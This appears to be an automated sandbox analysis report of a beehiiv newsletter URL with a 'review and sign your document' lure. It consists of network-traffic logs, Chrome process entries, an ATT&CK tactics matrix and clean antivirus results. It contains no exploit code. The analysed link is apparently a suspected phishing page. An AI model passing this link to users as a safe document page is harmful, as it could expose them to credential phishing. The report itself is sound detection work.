Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: classification engineClassification label: sus22.win@26/399@106/20
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1916,i,3467026499799808514,5900654251676485777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1916,i,3467026499799808514,5900654251676485777,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Drive-by Compromise
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://kanes-newsletter-871ead.beehiiv.com/assets/index-DcpNk-OI.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/YoutubeIcon-DSouMQiN.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/bugs-DVQzBh-s.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/cdn-cgi/challenge-platform/h/b/jsd/r/9027d88b8fd319020%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/Image-ycA_AFLr.js0%Avira URL Cloudsafe
https://kanes-newsletter-871ead.beehiiv.com/assets/index-COqk5b7U.js0%Avira URL Cloudsafe
